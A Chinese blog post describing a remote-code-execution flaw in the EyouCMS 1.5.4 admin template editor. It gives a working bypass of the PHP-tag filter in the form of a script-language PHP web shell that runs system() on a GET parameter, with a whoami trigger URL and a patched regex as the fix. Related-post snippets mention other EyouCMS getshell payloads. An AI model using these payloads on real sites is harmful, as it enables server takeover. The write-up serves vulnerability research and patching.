Eyoucms 1.5.4 后台模板修改导致RCE

最新推荐文章于 2025-04-28 19:59:50 发布
最新推荐文章于 2025-04-28 19:59:50 发布
阅读量1.6k 收藏 12
点赞数 8
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60856074/article/details/139430825
版权

        最近要期末考试,审计了一个thinkphp5.0框架的cms,参考大佬博客时,发现1.5.4版本的RCE漏洞利用方法<?= 的格式被过滤了,然后看了看过滤,方式,想到了其他的绕过方法,就是利用我们的script标签语言,来进行绕过;

代码分析

先看具体的过滤代码,仔细看一下if判断函数的代码,可以看到这里过滤了<?php<??>{eyou:php{php 、以及<?=等;

 if (preg_match('#<([^?]*)\?php#i', $content) || preg_match('#<\?\=(\s+)#i', $content) || preg_match('#\{eyou\:php([^\}]*)\}#i', $content) || preg_match('#\{php([^\}]*)\}#i', $content)) {
                return "模板里不允许有php语法,为了安全考虑,请通过FTP工具进行编辑上传。";
            }

具体的绕过如下:

<script language="php">system($_GET[a]);</script>

写入我们的恶意代码后,开启xdebug来进行调试,看下图,可以看到恶意代码成功绕过了正则匹配的判断(其实,不开debug,前端就直接回显了)

漏洞验证:

http://eyoucms:8016/?a=whoami

修复建议:

利用正则匹配,过滤掉script标签的关键字:如language="php"

if (preg_match('#<([^?]*)\?php#i', $content) || preg_match('#<\?(\s*)=#i', $content) || (preg_match('#<\?#i', $content) && preg_match('#\?>#i', $content)) || preg_match('#\{eyou\:php([^\}]*)\}#i', $content) || preg_match('#\{php([^\}]*)\}#i', $content) || preg_match('#(\s+)language(\s*)=(\s*)("|\')?php("|\')?#i', $content)){
    return "模板里不允许有php语法,为了安全考虑,请通过FTP工具进行编辑上传。";
}

再次写入我们的script标签,漏洞就不能够再次利用:

EyouCMS V. 前台getshell漏洞复现
UgzWeb的博客
09-27 1639
为了保护系统安全,用户和开发者应该采取相应的安全措施,包括及时更新系统、输入验证与过滤、敏感文件保护和安全意识培训等。该漏洞允许攻击者通过构造恶意请求,在未经授权的情况下执行任意代码,从而获取服务器的控制权。对于用户输入的数据,开发者应该进行严格的验证与过滤,以防止恶意输入绕过安全机制。针对敏感文件,开发者应该采取措施进行保护,例如将敏感文件移动到非Web可访问目录或者使用访问控制机制,限制对敏感文件的直接访问。用户和开发者应该接受相关的安全意识培训,了解常见的安全漏洞和攻击技术,并采取相应的防护措施。
MetroNic_1.5.4后台模版
03-07
MetroNic_1.5.4后台模版(另一个是MetroNic_1.5.4前台模版)
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
漏洞简介:易优cms企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。可以用来快速建设一个企业网站( PC,手机,微信都可以访问
CVE-2024-3431 EyouCMS 反序列化漏洞研究分析
shelter1234567的博客
04-28 1150
易优内容管理系统(EyouCms) 隶属于海口快推科技有限公司,专注中小型企业信息传播解决方案,利用网络传递信息在一定程度上提高了办事的效率,提高企业的竞争力。EyouCms 是一个自由和开放源码的内容管理系统,它是一个可以独立使用的内容发布系统(CMS)。以模板多、易优化、开源而闻名,是国内新锐的 PHP 开源网站管理系统,也是最受用户好评的 PHP 类 CMS 系统。EyouCms版本v.1.5.6在后台组件文件/login.php?
eyoucms 1.5.5任意命令执行漏洞(0day)
羽的博客
12-30 9724
eyoucms 1.5.5任意命令执行漏洞 文章目录eyoucms 1.5.5任意命令执行漏洞一、漏洞简介二、漏洞影响三、复现过程漏洞位置漏洞分析漏洞利用 一、漏洞简介 eyoucms1.5.5后台存在任意命令执行漏洞。 二、漏洞影响 eyoucms1.5.5 三、复现过程 漏洞位置 application\admin\logic\FilemanagerLogic.php editFile函数。 漏洞分析 当我们在模板管理功能的页面中传入php代码时会被解析。但是存在过滤,过滤如下: $content =
EyouCMSv1.5.1漏洞复现
m0_69801663的博客
12-29 7052
EyouCMSv1.5.1漏洞复现
eyoucms 1.4.6 XSS vulnerability
qq_42560798的博客
10-13 512
eyoucms 1.4.6 XSS vulnerabilityVulnerability describes Vulnerability describes Vulnerability found in Eyoucms1.4.6 and prior releases. In the member center member contribution office, after editing the contribution content through the editor, intercept the
EyouCms1.0前台GetShell漏洞复现
weixin_44897902的博客
12-08 3893
漏洞名称: EyouCms1.0前台GetShell 漏洞影响: EyouCms1.0 复现过程: url/index.php/api/Uploadify/preview 若出现: 则说明存在漏洞 <?php phpinfo(); 通过post数据: data:image/php;base64,PD9waHAgcGhwaW5mbygpOw== 页面返回: 访问:url/p...
易优cms 后台网址是多少 Eyoucms快速入门
PHP错误汇总
10-27 3454
你好,易优后台默认登录网址是(你的域名/login.php)。 如果你使用过程中想要更改路径可以在后台设置里更改。位置是,基本信息,核心设置,新后台地址。
Eyoucms SSTI漏洞-2019年老文
J0o1ey Blog
05-16 1386
### 0x01 审计起因 由于在先知查看文章的时候无意看到了EyouCMS漏洞复现文章,于是产生了审计之心 0x02 EyouCMS简介 EyouCms是基于TP5.0框架为核心开发的免费+开源的企业内容管理系统,专注企业建站用户需求。提供海量各行业模板,降低中小企业网站建设、网络营销成本,致力于打造用户舒适的建站体验。这是一套安全、简洁、免费的流行CMS,包含完整后台管理、前台展示,直接下载安装即可使用。 演示网址:http://demo.eyoucms.com 官方网站:http://ww
忘记eyoucms后台密码怎么办?
PHP错误汇总
04-12 929
下载附件后解压,将setpwd.php文件上传到网站根目录,浏览器访问 http://你的网址/setpwd.php ,按照操作执行就可以。不用着急,官方为大伙整了个易优修改重置后台密码小工具。修改完之后,请立即删除该文件,免得被其他人修改。方便大家忘记后台登陆密码时,快速重置。
使用PHP开发的FTP客户端
03-13
使用PHP开发的FTP客户端,有文件上传、下载和编辑等功能。非自己开发的,转载来的。
实训商业源码-光年积分商城V1.5.4-论文模板.zip
05-15
实训商业源码-光年积分商城V1.5.4-论文模板.zip
metronic_1.5.4_企业网站扁平化网页模板美工UI整站.zip
08-01
"Metronic 1.5.4"是一款专为企业网站设计的扁平化网页模板,集成了先进的前端技术和精美UI设计,旨在提供一个高效、灵活且响应式的网站构建框架。这款模板以其简洁、直观的界面风格,以及对不同设备和屏幕尺寸的良好...
实训商业源码-螃蟹红包码V1.5.4 修复pk颜值版-论文模板.zip
最新发布
05-16
实训商业源码-螃蟹红包码V1.5.4 修复pk颜值版-论文模板.zip
超级漂亮的MetroNic_1.5.4_Fontend模板
12-11
看到大家评论都在找MetroNic_1.5.4的 Fontend Themes,我这里正好有一套,就分享给大家了。 -----------------------------------...里面包含所有资源,甚至说明文档和可以修改的PSD文件,现在这个只是五个的前台模板
解决Eyoucms用Apache搭建网站后台无法登录的问题
weixin_45786861的博客
03-30 574
我们用Apache搭建好网站后登录后台时部分人却无法登录,下面就我自己遇到的问题发表自己的看法! 一、介绍遇到的问题。 首先确保你的虚拟机磁盘没有满载还有空余 二、解决问题! 我们要把这个后端的站点转给其他普通用户不能再root目录下,我这个使用我自己的普通用户chang来演示。 首先进入到PHP文件的上一个目录我这里也就是html,也可以用路径来表示。 然后执行这二条命令! 改变所有者 cho...
易优cms后台RCE以及任意文件上传漏洞
weixin_30415113的博客
07-31 4040
前言 EyouCms是基于TP5.0框架为核心开发的免费+开源的企业内容管理系统,专注企业建站用户需求提供海量各行业模板,降低中小企业网站建设、网络营销成本,致力于打造用户舒适的建站体验。易优cms v1.3.7后台插件模块存在代码执行漏洞。 正文 Weapp.php文件中的create()方法接收了请求中的参数,过滤后直接存入php配置文件中,但是由于过滤不严,导致可以直接写...
eyoucms1.6漏洞复现
06-09
为了避免漏洞被利用,我不能提供直接的漏洞复现步骤,但我可以告诉您该漏洞的一般性情况和解决方法。 eyoucms 1.6存在多个漏洞,包括任意文件上传、SQL注入和远程命令执行等。攻击者可以利用这些漏洞在系统中执行恶意代码,获取系统权限,窃取敏感信息等。 解决这些漏洞的方法包括: 1. 及时升级eyoucms到最新版本,开发者通常会根据安全漏洞修复进行版本升级。 2. 在使用eyoucms时,严格遵循安全规范,例如不要使用默认的管理员账号和密码,不要将敏感信息存储在公共文件夹中,限制文件上传和下载的类型和大小等。 3. 加强服务器的安全性监控和防御能力,例如安装防火墙、入侵检测系统和安全审计系统等,及时发现并阻止攻击。 如果您怀疑系统已经受到攻击,请立即停止服务器,并进行全面检查和修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值